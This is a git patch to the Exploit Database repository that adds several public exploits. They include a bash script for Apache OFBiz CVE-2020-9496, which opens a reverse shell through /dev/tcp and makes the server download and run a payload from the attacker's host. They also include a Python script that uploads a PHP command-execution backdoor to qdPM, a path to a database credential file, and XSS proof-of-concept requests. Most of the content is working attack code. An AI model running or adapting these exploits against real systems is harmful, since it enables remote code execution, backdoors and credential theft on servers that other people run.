From 2bcb3e5c5e1961dd722935d4bb936d0d6fab634f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 5 Aug 2021 05:01:56 +0000 Subject: [PATCH] DB: 2021-08-05 6 changes to exploits/shellcodes WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS) qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated) Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments --- exploits/java/webapps/50178.sh | 78 +++++++++++++++++++++++ exploits/php/webapps/49352.txt | 1 + exploits/php/webapps/50174.txt | 15 +++++ exploits/php/webapps/50175.py | 112 +++++++++++++++++++++++++++++++++ exploits/php/webapps/50176.txt | 9 +++ exploits/php/webapps/50177.txt | 63 +++++++++++++++++++ files_exploits.csv | 5 ++ 7 files changed, 283 insertions(+) create mode 100755 exploits/java/webapps/50178.sh create mode 100644 exploits/php/webapps/50174.txt create mode 100755 exploits/php/webapps/50175.py create mode 100644 exploits/php/webapps/50176.txt create mode 100644 exploits/php/webapps/50177.txt diff --git a/exploits/java/webapps/50178.sh b/exploits/java/webapps/50178.sh new file mode 100755 index 000000000..ad275485f --- /dev/null +++ b/exploits/java/webapps/50178.sh @@ -0,0 +1,78 @@ +# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments +# Date: 2021-08-04 +# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd) +# Vendor Homepage: https://ofbiz.apache.org/index.html +# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip +# Version: 17.12.01 +# Tested on: Linux + +# CVE : CVE-2020-9496 + +# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/ + +# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE. + +#!/usr/bin/env bash + +# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization. +# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team. +# +# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc. +# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution. +# +# Steps to exploit: +# +# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80) +# Step 2: Start nc listener (Recommended 8001). +# Step 3: Run the exploit. + + +url='https://127.0.0.1' # CHANGE THIS +port=8443 # CHANGE THIS + +function helpPanel(){ + echo -e "\nUsage:" + echo -e "\t[-i] Attacker's IP" + echo -e "\t[-p] Attacker's Port" + echo -e "\t[-h] Show help pannel" + exit 1 +} + + +function ctrl_c(){ + echo -e "\n\n[!] Exiting...\n" + exit 1 +} +# Ctrl + C +trap ctrl_c INT + +function webRequest(){ + echo -e "\n[*] Creating a shell file with bash\n" + echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh + echo -e "[*] Downloading YsoSerial JAR File\n" + wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar + echo -e "[*] Generating a JAR payload\n" + payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n") + echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5 + curl -s $url:$port/webtools/control/xmlrpc -X POST -d "ProjectDiscoverytest$payload" -k -H 'Content-Type:application/xml' &>/dev/null + echo -e "[*] Generating a second JAR payload" + payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n") + echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5 + curl -s $url:$port/webtools/control/xmlrpc -X POST -d "ProjectDiscoverytest$payload2" -k -H 'Content-Type:application/xml' &>/dev/null + echo -e "\n[*]Deleting Files..." + rm ysoserial-master-d367e379d9-1.jar && rm shell.sh +} + +declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do + case $arg in + i) ip=$OPTARG; let parameter_enable+=1;; + p) ncport=$OPTARG; let parameter_enable+=1;; + h) helpPanel;; + esac +done + +if [ $parameter_enable -ne 2 ]; then + helpPanel +else + webRequest +fi \ No newline at end of file diff --git a/exploits/php/webapps/49352.txt b/exploits/php/webapps/49352.txt index e7f524bc3..daa3dd95f 100644 --- a/exploits/php/webapps/49352.txt +++ b/exploits/php/webapps/49352.txt @@ -8,6 +8,7 @@ # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application +# CVE: CVE-2021-25791 Step 1: Create a new user then login Step 2: Click on "Register" page to register a room. diff --git a/exploits/php/webapps/50174.txt b/exploits/php/webapps/50174.txt new file mode 100644 index 000000000..2b11d48f3 --- /dev/null +++ b/exploits/php/webapps/50174.txt @@ -0,0 +1,15 @@ +# Exploit Title: WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS) +# Date: 2021-08-03 +# Exploit Author: Aryan Chehreghani +# Software Link: https://wordpress.org/plugins/customize-login/ +# Version: 1.1 +# Tested on: Windows 10 + +How to Reproduce this Vulnerability: + +1. Install WordPress 5.8 +2. Install and activate WP Customize Login +3. Navigate to Customize Login under Settings Tab >> enter the XSS payload into the Change Logo Title input field. +4. Click Save Changes. +5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. +6. Payload Used: "> \ No newline at end of file diff --git a/exploits/php/webapps/50175.py b/exploits/php/webapps/50175.py new file mode 100755 index 000000000..3685a1e7e --- /dev/null +++ b/exploits/php/webapps/50175.py @@ -0,0 +1,112 @@ +# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) +# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net +# Date: 2021-08-03 +# Original Exploit Author: Rishal Dwivedi (Loginsoft) +# Original ExploitDB ID: 47954 +# Exploit Author: Leon Trappett (thepcn3rd) +# Vendor Homepage: http://qdpm.net/ +# Software Link: http://qdpm.net/download-qdpm-free-project-management +# Version: <=1.9.1 +# Tested on: Ubuntu Server 20.04 (Python 3.9.2) +# CVE : CVE-2020-7246 +# Exploit written in Python 3.9.2 +# Tested Environment - Ubuntu Server 20.04 LTS +# Path Traversal + Remote Code Execution + +#!/usr/bin/python3 + +import sys +import requests +from lxml import html +from argparse import ArgumentParser + +session_requests = requests.session() + +def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar): + request_1 = { + 'sf_method': (None, 'put'), + 'users[id]': (None, userid[-1]), + 'users[photo_preview]': (None, uservar), + 'users[_csrf_token]': (None, csrftoken_[-1]), + 'users[name]': (None, username[-1]), + 'users[new_password]': (None, ''), + 'users[email]': (None, EMAIL), + 'extra_fields[9]': (None, ''), + 'users[remove_photo]': (None, '1'), + } + return request_1 + + +def req(userid, username, csrftoken_, EMAIL, HOSTNAME): + request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, +'.htaccess') + new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', +files=request_1) + request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, +'../.htaccess') + new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', +files=request_2) + request_3 = { + 'sf_method': (None, 'put'), + 'users[id]': (None, userid[-1]), + 'users[photo_preview]': (None, ''), + 'users[_csrf_token]': (None, csrftoken_[-1]), + 'users[name]': (None, username[-1]), + 'users[new_password]': (None, ''), + 'users[email]': (None, EMAIL), + 'extra_fields[9]': (None, ''), + 'users[photo]': ('backdoor.php', + '"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>' + , 'application/octet-stream'), + } + upload_req = session_requests.post(HOSTNAME + +'index.php/myAccount/update', files=request_3) + + +def main(HOSTNAME, EMAIL, PASSWORD): + url = HOSTNAME + '/index.php/login' + result = session_requests.get(url) + #print(result.text) + login_tree = html.fromstring(result.text) + authenticity_token = +list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0] + payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, +'login[_csrf_token]': authenticity_token} + result = session_requests.post(HOSTNAME + '/index.php/login', +data=payload, headers=dict(referer=HOSTNAME + '/index.php/login')) + # The designated admin account does not have a myAccount page + account_page = session_requests.get(HOSTNAME + 'index.php/myAccount') + account_tree = html.fromstring(account_page.content) + userid = account_tree.xpath("//input[@name='users[id]']/@value") + username = account_tree.xpath("//input[@name='users[name]']/@value") + csrftoken_ = +account_tree.xpath("//input[@name='users[_csrf_token]']/@value") + req(userid, username, csrftoken_, EMAIL, HOSTNAME) + get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') + final_tree = html.fromstring(get_file.content) + backdoor = +final_tree.xpath("//input[@name='users[photo_preview]']/@value") + print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' + +backdoor[-1] + '?cmd=whoami') + + +if __name__ == '__main__': + print("You are not able to use the designated admin account because +they do not have a myAccount page.\n") + parser = ArgumentParser(description='qdmp - Path traversal + RCE +Exploit') + parser.add_argument('-url', '--host', dest='hostname', help='Project +URL') + parser.add_argument('-u', '--email', dest='email', help='User email +(Any privilege account)') + parser.add_argument('-p', '--password', dest='password', help='User +password') + args = parser.parse_args() + # Added detection if the arguments are passed and populated, if not +display the arguments + if (len(sys.argv) > 1 and isinstance(args.hostname, str) and +isinstance(args.email, str) and isinstance(args.password, str)): + main(args.hostname, args.email, args.password) + else: + parser.print_help() \ No newline at end of file diff --git a/exploits/php/webapps/50176.txt b/exploits/php/webapps/50176.txt new file mode 100644 index 000000000..77ff54d95 --- /dev/null +++ b/exploits/php/webapps/50176.txt @@ -0,0 +1,9 @@ +# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated) +# Date: 03/08/2021 +# Exploit Author: Leon Trappett (thepcn3rd) +# Vendor Homepage: https://qdpm.net/ +# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download +# Version: 9.2 +# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4 + +The password and connection string for the database are stored in a yml file. To access the yml file you can go to http:///core/config/databases.yml file and download. \ No newline at end of file diff --git a/exploits/php/webapps/50177.txt b/exploits/php/webapps/50177.txt new file mode 100644 index 000000000..fb45063d3 --- /dev/null +++ b/exploits/php/webapps/50177.txt @@ -0,0 +1,63 @@ +# Exploit Title: Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS) +# Date: 2021-08-04 +# Exploit Author: Mohammad Koochaki +# Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841 +# Version: 1.1 +# Tested on: Ubuntu 20.04.2 LTS, PHP 7.4.3 + +### This application is prone to a cross-site scripting in the 'searchdata' +parameter at the following path: + - Reflected: http://localhost/admin/search-invoices.php + - Reflected: http://localhost/client/search-invoices.php + - Stored: http://localhost/client/client-profile.php + +### Payloads: + - Reflected: + - Stored: ">Anuj+Kumar + +### PoC: + +## Reflected: +POST /admin/search-invoices.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 +Firefox/78.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 77 +Origin: http://localhost +Connection: close +Referer: http://localhost/admin/search-invoices.php +Cookie: PHPSESSID=o5thu5n92ac58evl71eou90krs +Upgrade-Insecure-Requests: 1 +DNT: 1 +Sec-GPC: 1 + +searchdata=&search= + + +## Stored: +POST /client/client-profile.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 +Firefox/78.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 335 +Origin: http://localhost +Connection: close +Referer: http://localhost/client/client-profile.php +Cookie: PHPSESSID=o5thu5n92ac58evl71eou90krs +Upgrade-Insecure-Requests: 1 +DNT: 1 +Sec-GPC: 1 + +cname=">Anuj+Kumar&comname=PHPGurukul+Programming+Blog&address=New+Delhi&city=New+Delhi&state=Delhi&zcode=110001&wphnumber=9354778033&cellphnumber=9354778033&ophnumber=9354778033&email=phpgurukulofficial% +40gmail.com&websiteadd=https%3A%2F%2Fphpgurukul.com¬es=New+User&submit= \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 85275e73d..af83c88d3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44304,3 +44304,8 @@ id,file,description,date,author,type,platform,port 50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",2021-08-02,"Mohammad Koochaki",webapps,php, 50172,exploits/hardware/webapps/50172.txt,"Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF",2021-08-02,LiquidWorm,webapps,hardware, 50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",2021-08-03,"Merbin Russel",webapps,php, +50174,exploits/php/webapps/50174.txt,"WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)",2021-08-04,"Aryan Chehreghani",webapps,php, +50175,exploits/php/webapps/50175.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-04,"Leon Trappett",webapps,php, +50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)",2021-08-04,"Leon Trappett",webapps,php, +50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php, +50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments",2021-08-04,"Adrián Díaz",webapps,java,